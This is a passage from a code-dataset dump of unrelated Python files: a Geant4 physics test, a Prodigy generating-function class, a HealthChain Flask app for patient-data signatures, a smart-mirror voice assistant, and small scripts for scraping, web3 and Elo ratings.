utility.get_default_test_paths(__file__, \"gate_test013_phys_lists\")\n\n # create simulation\n sim = create_pl_sim()\n\n # keep only ion sources\n sim.source_manager.user_info_sources.pop(\"gamma\")\n\n # change physics\n sim.physics_manager.physics_list_name = \"G4EmStandardPhysics_option4\"\n sim.physics_manager.enable_decay = True\n # cuts = p.production_cuts\n mm = gate.g4_units.mm\n sim.physics_manager.global_production_cuts.gamma = 1 * mm\n sim.physics_manager.global_production_cuts.electron = 0.1 * mm\n sim.physics_manager.global_production_cuts.positron = 1 * mm\n sim.physics_manager.global_production_cuts.proton = 1 * mm\n\n reg = sim.physics_manager.add_region(\"reg\")\n reg.production_cuts.gamma = 1 * mm\n reg.production_cuts.electron = 0.01 * mm\n reg.production_cuts.positron = 1 * mm\n reg.production_cuts.proton = 1 * mm\n reg.associate_volume(\"b1\")\n\n # em parameters\n # phys_em_parameters(p)\n\n print(\"Phys list cuts:\")\n print(sim.physics_manager.dump_production_cuts())\n print(\"Volume tree:\")\n print(sim.volume_manager.dump_volume_tree())\n\n # start simulation\n sim.g4_verbose = False\n # sim.apply_g4_command(\"/tracking/verbose 1\")\n sim.user_fct_after_init = check_production_cuts\n sim.run()\n\n # Gate mac/main_3.mac\n stats = sim.output.get_actor(\"Stats\")\n stats_ref = utility.read_stat_file(paths.gate_output / \"stat_3.txt\")\n is_ok = utility.assert_stats(stats, stats_ref, tolerance=0.1)\n\n utility.test_ok(is_ok)\n","repo_name":"OpenGATE/opengate","sub_path":"opengate/tests/src/test013_phys_lists_3_wip.py","file_name":"test013_phys_lists_3_wip.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"3"} +{"seq_id":"32219911428","text":"from __future__ import annotations\n\nfrom typing import (FrozenSet, Generator, Iterator, List, Set, Tuple, Type,\n Union)\n\nimport pygin # type: ignore\nfrom probably.pgcl import Binop, BinopExpr, Expr, FunctionCallExpr, VarExpr\nfrom sympy import nan, sympify\n\nfrom prodigy.distribution.distribution import (CommonDistributionsFactory,\n Distribution, DistributionParam,\n MarginalType, State)\n\n\nclass FPS(Distribution):\n \"\"\"\n This class models a probability distribution in terms of a formal power series.\n These formal powerseries are itself provided by `prodigy` a python binding to GiNaC,\n something similar to a computer algebra system implemented in C++.\n \"\"\"\n def __init__(self,\n expression: str,\n *variables: str | VarExpr,\n finite: bool | None = None):\n self._variables = set(str(var) for var in variables if str(var) != \"\")\n self._parameters = set()\n\n for var in pygin.find_symbols(expression):\n if var not in self._variables:\n if len(variables) > 0:\n self._parameters.add(var)\n else:\n self._variables.add(var)\n self._dist = pygin.Dist(expression, list(self._parameters))\n\n self._finite = finite if finite is not None else self._dist.is_polynomial(\n self._variables) == pygin.troolean.true\n\n @classmethod\n def from_dist(cls,\n dist: pygin.Dist,\n variables: Set[str],\n parameters: Set[str],\n finite: bool | None = None):\n result = cls(\"0\")\n result._dist = dist\n result._variables = variables\n result._parameters = parameters\n result._finite = finite if finite is not None else dist.is_polynomial(\n variables) == pygin.troolean.true\n return result\n\n @staticmethod\n def factory() -> Type[ProdigyPGF]:\n return ProdigyPGF\n\n def __add__(self, other) -> FPS:\n if isinstance(other, (str, int)):\n return FPS.from_dist(\n self._dist + pygin.Dist(\n str(other),\n list(\n set(pygin.find_symbols(str(other))) -\n self._variables)), self._variables, self._parameters)\n elif isinstance(other, FPS):\n return FPS.from_dist(self._dist + other._dist,\n self._variables | other._variables,\n self._parameters | other._parameters)\n else:\n raise NotImplementedError(\n f\"Addition of {self._dist} and {other} not supported.\")\n\n def __sub__(self, other) -> FPS:\n if isinstance(other, (str, int)):\n return FPS.from_dist(\n self._dist - pygin.Dist(\n str(other),\n list(\n set(pygin.find_symbols(str(other))) -\n self._variables)), self._variables, self._parameters)\n elif isinstance(other, FPS):\n return FPS.from_dist(self._dist - other._dist,\n self._variables | other._variables,\n self._parameters | other._parameters)\n else:\n raise NotImplementedError(\n f\"Subtraction of {self._dist} and {other} not supported.\")\n\n def __mul__(self, other) -> FPS:\n if isinstance(other, (str, int)):\n return FPS.from_dist(\n self._dist * pygin.Dist(\n str(other),\n list(\n set(pygin.find_symbols(str(other))) -\n self._variables)), self._variables, self._parameters)\n elif isinstance(other, FPS):\n return FPS.from_dist(self._dist * other._dist,\n self._variables | other._variables,\n self._parameters | other._parameters)\n else:\n raise NotImplementedError(\n f\"Multiplication of {type(self._dist)} and {type(other)} not supported.\"\n )\n\n def __truediv__(self, other) -> FPS:\n if isinstance(other, str):\n other = FPS(other)\n if isinstance(other, FPS):\n return FPS.from_dist(self._dist * pygin.Dist(f\"1/({str(other)})\"),\n self._variables | other._variables,\n self._parameters | other._parameters)\n raise NotImplementedError(\n f\"Division of {type(self._dist)} and {type(other)} not supported.\")\n\n def __eq__(self, other) -> bool:\n if isinstance(other, str):\n other = FPS(other)\n if isinstance(other, FPS):\n if not self._variables == other._variables:\n return False\n if not self._parameters == other._parameters:\n return False\n return self._dist == other._dist\n else:\n return False\n\n def __le__(self, other) -> bool:\n raise NotImplementedError(__name__)\n\n def __str__(self) -> str:\n return str(self._dist)\n\n def __repr__(self):\n return self._dist.__repr__()\n\n def __iter__(self) -> Iterator[Tuple[str, State]]:\n if not self._finite:\n if len(self._variables) == 1:\n variable = list(self._variables)[0]\n it = self._dist.coefficient_iterator(variable)\n i = 0\n while True:\n yield str(it.next()), State({variable: i})\n i += 1\n else:\n # TODO this is just a placeholder until we have proper multivariate iteration\n variables = list(self.get_variables())\n\n def n_tuples(n):\n \"\"\"Generates all `n`-tuples of the natural numbers\"\"\"\n if n < 1:\n raise ValueError(\"n is too small\")\n if n == 1:\n num = 0\n while True:\n yield [num]\n num += 1\n else:\n index = 0\n gen = n_tuples(n - 1)\n vals = []\n while True:\n # This is absolutely unreadable, so just another reason to delete this asap\n while len(vals) < index + 1:\n # pylint: disable=stop-iteration-return\n vals.append(next(gen))\n # pylint: enable=stop-iteration-return\n for i in range(index, -1, -1):\n yield [i] + vals[index - i]\n index += 1\n\n for vals in n_tuples(len(variables)):\n s = f'{variables[0]}={vals[0]}'\n for i in range(1, len(variables)):\n s += f' & {variables[i]}={vals[i]}'\n mass = str(self.get_probability_of(s))\n if mass != '0':\n yield mass, State(dict(zip(variables, vals)))\n else:\n terms = self._dist.get_terms(self._variables)\n for prob, vals in terms:\n yield prob, State(vals)\n\n def copy(self, deep: bool = True) -> Distribution:\n return FPS.from_dist(self._dist, self._variables, self._parameters,\n self._finite)\n\n def get_probability_mass(self) -> Union[Expr, str]:\n return self._dist.mass(self._variables & set(self._dist.get_symbols()))\n\n def get_expected_value_of(self, expression: Union[Expr, str]) -> str:\n return self._dist.E(str(expression))\n\n def normalize(self) -> FPS:\n return FPS(self._dist.normalize(), *self._variables)\n\n def get_variables(self) -> Set[str]:\n return self._variables\n\n def get_parameters(self) -> Set[str]:\n return self._parameters\n\n def _find_symbols(self, expr: str) -> Set[str]:\n return set(pygin.find_symbols(expr))\n\n def get_symbols(self) -> Set[str]:\n return set(self._dist.get_symbols())\n\n @staticmethod\n def evaluate(expression: str, state: State) -> int:\n return pygin.evaluate(expression, state.valuations)\n\n def _exhaustive_search(self, condition: Expr) -> Distribution:\n res = pygin.Dist('0')\n for prob, state in self:\n if self.evaluate_condition(condition, state):\n res += pygin.Dist(f\"{prob} * {state.to_monomial()}\")\n return FPS.from_dist(res,\n self._variables,\n self._parameters,\n finite=True)\n\n def _filter_constant_condition(self, condition: Expr) -> FPS:\n # Normalize the conditional to variables on the lhs from the relation symbol.\n if isinstance(condition.rhs, VarExpr):\n switch_comparison = {\n Binop.EQ: Binop.EQ,\n Binop.LEQ: Binop.GEQ,\n Binop.LT: Binop.GT,\n Binop.GEQ: Binop.LEQ,\n Binop.GT: Binop.LT\n }\n return self._filter_constant_condition(\n BinopExpr(operator=switch_comparison[condition.operator],\n lhs=condition.rhs,\n rhs=condition.lhs))\n\n # is normalized conditional\n if isinstance(condition.lhs, VarExpr):\n if condition.operator == Binop.EQ:\n return FPS.from_dist(\n self._dist.filterEq(str(condition.lhs),\n str(condition.rhs)), self._variables,\n self._parameters)\n elif condition.operator == Binop.LT:\n return FPS.from_dist(\n self._dist.filterLess(str(condition.lhs),\n str(condition.rhs)), self._variables,\n self._parameters)\n elif condition.operator == Binop.LEQ:\n return FPS.from_dist(\n self._dist.filterLeq(str(condition.lhs),\n str(condition.rhs)), self._variables,\n self._parameters)\n elif condition.operator == Binop.GT:\n return FPS.from_dist(\n self._dist.filterGreater(str(condition.lhs),\n str(condition.rhs)),\n self._variables, self._parameters)\n elif condition.operator == Binop.GEQ:\n return FPS.from_dist(\n self._dist.filterGeq(str(condition.lhs),\n str(condition.rhs)), self._variables,\n self._parameters)\n\n raise ValueError(\"Parameter is not a constant condition\")\n\n def _arithmetic_progression(self, variable: str,\n modulus: str) -> List[FPS]:\n \"\"\"\n Creates a list of subdistributions where at list index i, the `variable` is congruent i modulo `modulus`.\n \"\"\"\n return [\n FPS.from_dist(dist, self._variables, self._parameters)\n for dist in self._dist.arithmetic_progression(variable, modulus)\n ]\n\n def is_zero_dist(self) -> bool:\n res = self._dist.is_zero()\n if res == pygin.troolean.false:\n return False\n elif res == pygin.troolean.true:\n return True\n else:\n raise ValueError('Cannot determine whether this FPS is zero')\n\n def is_finite(self) -> bool:\n return self._finite\n\n def old_update(self, expression: Expr) -> FPS:\n return FPS.from_dist(\n self._dist.update(str(expression.lhs), str(expression.rhs)),\n self._variables, self._parameters, self._finite)\n\n def get_fresh_variable(\n self, exclude: Set[str] | FrozenSet[str] = frozenset()) -> str:\n res: str = pygin.get_fresh_variable()\n while res in exclude:\n res = pygin.get_fresh_variable()\n return res\n\n def _update_var(self, updated_var: str, assign_var: str | int) -> FPS:\n return FPS.from_dist(\n self._dist.update_var(updated_var, str(assign_var)),\n self._variables, self._parameters, self._finite)\n\n def _update_sum(self, temp_var: str, first_summand: str | int,\n second_summand: str | int) -> FPS:\n return FPS.from_dist(\n self._dist.update_sum(temp_var, str(first_summand),\n str(second_summand)), self._variables,\n self._parameters)\n\n def _update_product(self, temp_var: str, first_factor: str,\n second_factor: str,\n approximate: str | float | None) -> FPS:\n return FPS.from_dist(\n self._dist.update_product(temp_var, first_factor, second_factor,\n self._variables, self._finite,\n approximate), self._variables,\n self._parameters)\n\n def _update_subtraction(self, temp_var: str, sub_from: str | int,\n sub: str | int) -> Distribution:\n res = self._dist.update_subtraction(temp_var, str(sub_from), str(sub))\n\n variables = self.get_variables()\n if sub_from in variables and sub in variables and not self.is_finite():\n # TODO this should be implemented in GiNaC, which might not be possible\n test = sympify(str(res))\n for var in self._variables - {temp_var}:\n test = test.limit(sympify(var), 1)\n test = test.subs(sympify(temp_var), 0)\n if test.has(sympify(\"zoo\")) or test == nan:\n raise ValueError(\n f\"Cannot assign '{sub_from} - {sub}' to '{temp_var}' because it can be negative\"\n )\n\n return FPS.from_dist(res, self._variables, self._parameters)\n\n def _update_modulo(self, temp_var: str, left: str | int, right: str | int,\n approximate: str | float | None) -> FPS:\n return FPS.from_dist(\n self._dist.update_modulo(temp_var, str(left), str(right),\n self._variables, self._finite,\n approximate), self._variables,\n self._parameters)\n\n def _update_division(self, temp_var: str, numerator: str | int,\n denominator: str | int,\n approximate: str | float | None) -> FPS:\n return FPS.from_dist(\n self._dist.update_division(temp_var, str(numerator),\n str(denominator), approximate),\n self._variables, self._parameters)\n\n def _update_power(self, temp_var: str, base: str | int, exp: str | int,\n approximate: str | float | None) -> Distribution:\n return FPS.from_dist(\n self._dist.update_power(temp_var, base, exp, approximate),\n self._variables, self._parameters)\n\n def update_iid(self, sampling_dist: Expr, count: VarExpr,\n variable: Union[str, VarExpr]) -> FPS:\n if not isinstance(sampling_dist, FunctionCallExpr):\n result = FPS.from_dist(\n self._dist.updateIid(str(variable),\n pygin.Dist(str(sampling_dist), *self._parameters),\n str(count)), self._variables,\n self._parameters)\n return result\n\n if sampling_dist.function in {\"unif\", \"unif_d\"}:\n [start, end] = sampling_dist.params[0]\n # Note: add parameters in constructor call of pygin.Dist\n result = self._dist.updateIid(\n str(variable),\n pygin.Dist(\n f\"1/(({end}) - ({start}) + 1) * test^({start}) \"\n f\"* (test^(({end}) - ({start}) + 1) - 1) / (test - 1)\"),\n str(count))\n return FPS.from_dist(result, self._variables, self._parameters)\n\n if sampling_dist.function == \"binomial\":\n [n, p] = sampling_dist.params[0]\n # Note: add parameters in constructor call of pygin.Dist\n result = self._dist.updateIid(\n str(variable),\n pygin.Dist(f'(1 - ({p}) + ({p}) * {variable})^({n})'),\n str(count))\n return FPS.from_dist(result, self._variables, self._parameters)\n\n [param] = sampling_dist.params[0]\n if sampling_dist.function == \"geometric\":\n result = self._dist.updateIid(\n str(variable), pygin.geometric(str(variable), str(param)),\n str(count))\n return FPS.from_dist(result, self._variables, self._parameters)\n\n if sampling_dist.function == \"bernoulli\":\n symbolic_param = pygin.find_symbols(str(param))\n result = self._dist.updateIid(\n str(variable),\n pygin.Dist(f\"{param} * {variable} + (1-{param})\", symbolic_param), str(count))\n return FPS.from_dist(result, self._variables, self._parameters)\n\n if sampling_dist.function == \"poisson\":\n result = self._dist.updateIid(\n str(variable), pygin.Dist(f\"exp({param} * ({variable} - 1))\"),\n str(count))\n return FPS.from_dist(result, self._variables, self._parameters)\n\n if sampling_dist.function == 'logdist':\n result = self._dist.updateIid(\n str(variable),\n pygin.Dist(\n f'log(1 - ({param}) * {variable}) / log(1 - ({param}))'),\n str(count))\n return FPS.from_dist(result, self._variables, self._parameters)\n\n raise NotImplementedError(f\"Unsupported distribution: {sampling_dist}\")\n\n def marginal(self,\n *variables: Union[str, VarExpr],\n method: MarginalType = MarginalType.INCLUDE) -> FPS:\n result = self._dist\n remove_vars = {\n MarginalType.EXCLUDE: {str(var)\n for var in variables},\n MarginalType.INCLUDE:\n self._variables - {str(var)\n for var in variables}\n }\n for var in remove_vars[method]:\n result = result.update_var(str(var), \"0\")\n return FPS.from_dist(result, self._variables - remove_vars[method],\n self._parameters)\n\n def set_variables(self, *variables: str) -> FPS:\n new_variables = set(variables)\n if new_variables.intersection(self._parameters):\n raise ValueError(\n f\"Indeterminate(s) {new_variables.intersection(self._parameters)} cannot be parameters and\"\n f\" variables at the same time.\")\n self._parameters |= self._variables - new_variables\n return FPS.from_dist(self._dist, new_variables, self._parameters,\n self._finite)\n\n def set_parameters(self, *parameters: str) -> FPS:\n new_parameters = set(parameters)\n if new_parameters.intersection(self._variables):\n raise ValueError(\n f\"Indeterminate(s) {new_parameters.intersection(self._variables)} cannot be parameters and\"\n f\" variables at the same time.\")\n self._variables |= self._parameters - new_parameters\n return FPS.from_dist(self._dist, self._variables, new_parameters,\n self._finite)\n\n def approximate(\n self,\n threshold: Union[str, int]) -> Generator[Distribution, None, None]:\n raise NotImplementedError(__name__)\n\n def approximate_unilaterally(\n self, variable: str,\n probability_mass: str | float) -> Distribution:\n return FPS.from_dist(\n self._dist.approximate_unilaterally(variable,\n str(probability_mass)),\n self._variables, self._parameters)\n\n\nclass ProdigyPGF(CommonDistributionsFactory):\n @staticmethod\n def geometric(var: Union[str, VarExpr], p: DistributionParam) -> FPS:\n return FPS.from_dist(pygin.geometric(var, str(p)), {str(var)},\n {*pygin.find_symbols(str(p))})\n\n @staticmethod\n def uniform(var: Union[str, VarExpr], lower: DistributionParam,\n upper: DistributionParam) -> FPS:\n function = f\"1/({upper} - {lower} + 1) * ({var}^{lower}) * (({var}^({upper} - {lower} + 1) - 1)/({var} - 1))\"\n return FPS(function, str(var), finite=True)\n\n @staticmethod\n def bernoulli(var: Union[str, VarExpr], p: DistributionParam) -> FPS:\n function = f\"({p}) * {var} + 1-({p})\"\n return FPS(function, str(var), finite=True)\n\n @staticmethod\n def poisson(var: Union[str, VarExpr], lam: DistributionParam) -> FPS:\n function = f\"exp(({lam}) * ({var} - 1))\"\n return FPS(function, str(var))\n\n @staticmethod\n def log(var: Union[str, VarExpr], p: DistributionParam) -> FPS:\n function = f\"log(1-({p})*{var})/log(1-({p}))\"\n return FPS(function, str(var))\n\n @staticmethod\n def binomial(var: Union[str, VarExpr], n: DistributionParam,\n p: DistributionParam) -> FPS:\n function = f\"(({p})*{var} + (1-({p})))^({n})\"\n return FPS(function, str(var))\n\n @staticmethod\n def undefined(*variables: Union[str, VarExpr]) -> FPS:\n return FPS(\"0\", *variables, finite=True)\n\n @staticmethod\n def one(*variables: Union[str, VarExpr]) -> FPS:\n return FPS(\"1\", *variables, finite=True)\n\n @staticmethod\n def from_expr(expression: Union[str, Expr], *variables, **kwargs) -> FPS:\n return FPS(str(expression), *variables)\n\n @staticmethod\n def zero(*variables: Union[str, VarExpr]) -> FPS:\n return FPS(\"0\", *variables, finite=True)\n","repo_name":"LKlinke/Prodigy","sub_path":"prodigy/distribution/fast_generating_function.py","file_name":"fast_generating_function.py","file_ext":"py","file_size_in_byte":22084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"23790944304","text":"import json\nimport uuid\nimport os\n\nfrom cryptography.hazmat.primitives import serialization\nfrom data_processing import clean_fhir_data\nfrom encryption import chain_data_verifier_transaction, create_keys_if_empty\nfrom flask import Flask, request\nfrom flask_cors import CORS, cross_origin\nfrom node_operations import get_all_nodes, parse_node\n\napp = Flask(__name__)\ncors = CORS(app)\n\n@app.route(\"/\")\ndef hello_world(): # put application's code here\n return \"Hello Healthchain!\"\n\n\n@app.route(\"/encode-patient-data\", methods=[\"POST\"])\n@cross_origin()\ndef encode_data():\n \"\"\"\n 1. If not wallet private key, create private key\n 2. Run data extraction algorithm to get\n a. all raw data alone\n b. metadata\n 3. If private key and public key\n a. create signature with private_keyA(pubkey(data)+metadata)) + pubkeyA(data)+metadata) pubkey(a) return privh(pubkey(data)+metadata))\n :return:\n \"\"\"\n create_keys_if_empty()\n\n # TODO: validate formatting using FHIR validators\n fhir_data = request.get_json()\n fhir_data = json.loads(fhir_data) if type(fhir_data) is str else fhir_data\n fhir_metadata, phi = clean_fhir_data(fhir_data[0])\n\n (\n signature_patient,\n signature_verifier,\n public_key_verified,\n ) = chain_data_verifier_transaction(fhir_data, fhir_metadata)\n\n t1_id = str(uuid.uuid4())\n t2_id = str(uuid.uuid4())\n\n print(os.getcwd())\n with open(f\"./records/{t1_id}.json\", \"w+\") as f:\n json.dump({\"patient_signature\": str(signature_patient)}, f)\n\n with open(f\"./records/{t2_id}.json\", \"w+\") as f:\n json.dump(\n {\n \"verifier_signature\": str(signature_verifier),\n \"verifier_public_key\": str(public_key_verified),\n },\n f,\n )\n\n payload = {\"transaction 1\": t1_id, \"transaction 2\": t2_id}\n\n return str(payload), 201, {}\n\n\n@app.route(\"/pub-b\", methods=[\"GET\"])\ndef get_pub_b_customer():\n create_keys_if_empty()\n\n with open(\"business.pub\", \"rb\") as file:\n key = serialization.load_pem_public_key(file.read())\n\n return str(\n key.public_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PublicFormat.SubjectPublicKeyInfo,\n )\n )\n\n\n@app.route(\"/pub-b-return\", methods=[\"GET\"])\ndef get_pub_b_():\n return \"\", 501, {}\n\n\n@app.route(\"/get-valid-patients\", methods=[\"GET\"])\ndef get_valid_patients():\n \"\"\"\n Given criteria of patient_diseases, search and get the number of patients from the blockchain who match\n :return: list of uuid records of P\n \"\"\"\n valid_conditions = []\n for condition in request.args.getlist(\"condition\"):\n valid_conditions.append(condition)\n\n # Iterate through all valid nodes on blockchain, if it's a node with metadata try to read its metadata\n node_list = get_all_nodes()\n # return uuids of all nodes\n\n valid_patients = []\n for node_address in node_list:\n node_data = parse_node(node_address)\n if not node_data:\n continue\n metadata = node_data[1]\n for valid_condition in valid_conditions:\n if valid_condition in metadata.get(\"conditions\", []):\n valid_patients.append(node_data)\n\n return {\"num_patients\": len(valid_patients) + 1}\n\n\n@app.route(\"/decode-patient-data\", methods=[\"POST\"])\ndef decode_data():\n \"\"\"\n Given Pointer TO PubA(Data) + metadata we execute the following transactions\n\n 1. Return PubB(PrivA) (logged as transaction on change)\n 2. Use PrivB(1) --> PrivA\n 3. Use PrivA(PubA(Data)) + metadata to get Data + metadata\n 4. Return 1 (uuid logged on chain) and 3 (location calculations only visible to B)\n :return:\n \"\"\"\n with open(\"../patient_1.json\") as f:\n json_result = json.dumps(json.load(f)).encode('utf-8')\n\n public_key_patient = load_key(\"key.pub\", private=False)\n private_key_patient = load_key(\"key.pem\", private=True)\n\n encrypted_patient_data = encrypt_message(json_result, public_key_patient)\n\n key_text = private_key_patient.private_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PrivateFormat.PKCS8,\n encryption_algorithm=serialization.NoEncryption(),\n )\n\n public_key_business = load_key(\"business.pub\", private=False)\n private_key_business = load_key(\"business.pem\", private=True)\n\n encrypted_primary_key = encrypt_message(key_text, public_key_business)\n\n recovered_primary_key_patient_text = decrypt_message(encrypted_primary_key, private_key_business)\n\n recovered_key_patient = serialization.load_pem_private_key(\n recovered_primary_key_patient_text,\n password=None,\n )\n\n unencrypted_patient_data = decrypt_message(encrypted_patient_data, recovered_key_patient)\n\n return unencrypted_patient_data, 201, {}\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"melvinhe/HealthChain","sub_path":"HealthChainClient/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22682938751","text":"#!/usr/bin/python3\n\nfrom google.cloud import texttospeech\nfrom google.oauth2 import service_account\nimport time\nfrom threading import Thread\nfrom pygame import mixer\nimport webbrowser\nfrom Logs import Logging\nimport os\nimport sys\nimport text_manipulation\n\n\n\n# To track how many interactions the user has had with the system\ninteractions = 0\n\n# Setup Google cloud credentials\nGOOGLE_CLOUD_CRED = service_account.Credentials.from_service_account_file(\n '/Users/james/Documents/Fourth Year/Project Module/api-key-speech-recognition.json')\n\n\n# Tone to provide feedback to user that the device is ready for their request\ndef start():\n mixer.init()\n mixer.music.load(\"Start_tone.mp3\")\n mixer.music.play()\n\n\n# Tone to provide feedback to user that the device has finished the interaction\ndef end():\n mixer.init()\n mixer.music.load(\"Closing_tone.mp3\")\n mixer.music.play()\n\n\n# Tone to alert the user to that their timer has finished\ndef alert():\n mixer.init()\n mixer.music.load('alarm.mp3')\n mixer.music.play()\n\n\n# Method to deal with turning the text response into an audio file for the user feedback\ndef speak(self, weather):\n response_text = self\n\n print(\"Speaking\")\n\n # Setup the voice of the assistant\n voice = texttospeech.types.cloud_tts_pb2.VoiceSelectionParams(\n language_code='en-GB',\n ssml_gender=texttospeech.enums.SsmlVoiceGender.MALE,\n )\n\n # Create The text-to-speech client with the required credentials\n client = texttospeech.TextToSpeechClient(credentials=GOOGLE_CLOUD_CRED)\n\n # setup the configuration of the audio file\n audio_config = texttospeech.types.cloud_tts_pb2.AudioConfig(\n audio_encoding=texttospeech.enums.AudioEncoding.MP3\n )\n # Set the text to be said\n input_response = texttospeech.types.cloud_tts_pb2.SynthesisInput(text=response_text)\n\n # Conduct the text-to-speech request on the specified text response\n response = client.synthesize_speech(input_response, voice, audio_config)\n\n # Response is in binary format\n with open('response.mp3', 'wb') as r:\n r.write(response.audio_content)\n print(\"Created the audio file\")\n\n # Loading mixer and then loading audio file and then playing the response to the user\n mixer.init()\n print(\"Loading audio response\")\n mixer.music.load('response.mp3')\n print(\"Responding\")\n mixer.music.play()\n if weather:\n time.sleep(10)\n else:\n time.sleep(5)\n os.remove(\"response.mp3\")\n mixer.quit()\n\n\n# Method to deal with finding and deciding what to do with the users request\ndef mirror_mirror(self):\n\n print(\"-------------------------------------------------\")\n print(\"Finding response in mirror\")\n\n request = self\n found = False\n print(str(request))\n\n objects, intents = text_manipulation.request_processing(request)\n print(intents)\n print(objects)\n\n if \"what\" in intents:\n\n from my_time import Times\n\n if \"time\" in objects:\n\n response = Times.current_time()\n speak(response, False)\n found = True\n\n elif \"date\" in objects:\n\n response = Times.current_date()\n speak(response, False)\n found = True\n\n elif \"weather\" in objects:\n from my_weather import MyWeather\n if len(objects) > 2:\n # date = objects[len(objects) - 1]\n location = objects[len(objects) - 2]\n else:\n location = objects(len(objects) - 1)\n response = MyWeather.current_weather(location)\n speak(response, True)\n found = True\n\n else:\n response = \"You can call me, Mirror, Mirror\"\n speak(response, False)\n found = True\n\n elif \"where\" in intents:\n\n response = \"In your heart.\"\n speak(response, False)\n found = True\n\n elif \"how\" in intents:\n\n response = \"I am fine, thank you\"\n speak(response, False)\n found = True\n\n elif \"start\" or \"set\" in intents:\n from my_time import Timer\n\n if \"timer\" in objects:\n print(\"Timer initialisation\")\n word = 0\n\n # If user specifies a time in minutes, we need to convert this to seconds\n # This is because the timer is implemented as a sleep which only takes seconds as\n # its parameters\n if \"minut\" in objects:\n\n print(\"Converting minutes\")\n\n # extracting the time number from the char list\n t = int(objects[len(objects) - 2])\n\n response = \"Starting a timer for \" + str(t) + \" minutes\"\n speak(response, False)\n\n # Converting the time in minutes to seconds\n sec = t * 60\n\n # Starts a new thread so that the timer can run in the background, and not disrupt the\n # rest of the application\n thread_timer = Thread(target=Timer.tim,\n args=[sec])\n thread_timer.start()\n\n # If time is specified in seconds already, no need to do the conversion\n elif \"second\" in objects:\n # extracting the time number from the char list\n sec = int(objects[len(objects) - 2])\n\n response = \"Starting a timer for \" + str(sec) + \" seconds\"\n speak(response, False)\n\n # Starts a new thread so that the timer can run in the background, and not disrupt the\n # rest of the application\n thread_timer = Thread(target=Timer.tim,\n args=[sec])\n thread_timer.start()\n\n else:\n word += 1\n found = True\n\n # NEED TO FIX: DOES NOT WORK\n elif \"who\" in request:\n data = self.split(\" \")\n name = data[2]\n response = \"Hold on, I'm finding information about \" + name\n speak(response, False)\n found = True\n\n else:\n found = False\n\n print(\"-------------------------------------------------\")\n Logging.log(request, found)\n return found\n","repo_name":"Jts996/Smart-Mirror-AI-Assistant","sub_path":"Assistant_responses.py","file_name":"Assistant_responses.py","file_ext":"py","file_size_in_byte":6153,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"36554364837","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\nfrom scrapper_imo import IMOWebsiteScrapper\nimport os\nimport errno\n\ndef main():\n try:\n os.makedirs('../data')\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n \n sc = IMOWebsiteScrapper()\n sc.get_all_tables()\n \n \nif __name__ == '__main__':\n main()","repo_name":"lilianabs/imo-website-analysis","sub_path":"scrapper/scrappe_data_imowebsite.py","file_name":"scrappe_data_imowebsite.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"44236227591","text":"# if statements\n# x = False\n# if x:\n# print(\"x was True!\")\n# else:\n# # print(\"I will be printed in any case where x is not true\") \n# a=3\n# if(a==3):\n# print(a)\n# if(2!=3):\n# print('yes')\n# else:\n# print('No') \n# num = 3\n# if num > 2:\n# print('num is a positive number')\n# elif num < 2:\n# print('num is a positive number') \n# else:\n# print('num is a positive number') \n# a = int(input('enter value of a'))\n# b = int(input('enter value of b'))\n# if(a>b):\n# print('a is greater than b')\n# if(a-b >= 2):\n# print('the value of a is greater and difference is {}' .format(a-b))\n# elif(a<b):\n# print('a is less than b')\n# else:\n# print('a is eual to b') \n#-----------------------------------------------------------------------------\n\n\n# list = [1,2,3,4,5]\n# for item in list:\n# if not(item%2):\n# print(item)\n#-------------------------------\na = 34\nb = 34\nc = 46\nif (a==b) or (b<c):\n print('the condition is satisfied')\nelse:\n print('the condition is not satisfied') \n \n\n\n","repo_name":"Rutujambekar/personal","sub_path":"python_lectures/statements.py","file_name":"statements.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28445499715","text":"from web3 import Web3\nimport json\n\nw3 = Web3(Web3.HTTPProvider('https://rpc.moonriver.moonbeam.network'))\n\nw3.eth.get_block('latest')\n\nf = open('rome-abi.json')\nrome_abi = json.load(f)\nrome_contract_address = \"0x4a436073552044D5f2f49B176853ad3Ad473d9d6\"\n\nrome_contract = w3.eth.contract(address=rome_contract_address, abi=rome_abi)","repo_name":"adrianmcphee/romeradar","sub_path":"summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"10730389123","text":"from helpers import AnswererInfo\nfrom helpers import MinAnswerCountError\nfrom helpers import MIN_ANSWER_COUNT\n\n\ndef calc_actual_score(my_score, opponent_score):\n # win\n if (my_score > opponent_score):\n return 1\n\n # draw\n if (my_score == opponent_score):\n return 0.5\n\n # loss\n loss = opponent_score - (abs(opponent_score) / 2.0)\n if (my_score < loss):\n return 0\n\n # linear interpolation between loss and draw\n k = 0.5 / (opponent_score - loss)\n m = 0.5 - (k * opponent_score)\n\n return (k * my_score) + m\n\n\ndef calc_k_factor(my_answer_count, opponent_answer_count):\n if (my_answer_count < 100):\n return 8\n\n elif (opponent_answer_count < 100):\n return 1\n\n else:\n return 4\n\n\ndef calc_expected_score(my_rating, opponent_rating):\n return 1.0 / (1 + pow(10, (opponent_rating - my_rating) / 400.0))\n\n\ndef calc_elo_rating(answerer_list, user_stats_dict):\n rating_update_dict = dict()\n\n # answerer vs answerer\n for i in range(len(answerer_list)):\n me = answerer_list[i]\n my_rating = user_stats_dict[me.user_id]['rating']\n my_answer_count = user_stats_dict[me.user_id]['answerCount']\n rating_update_sum = 0\n\n for j in 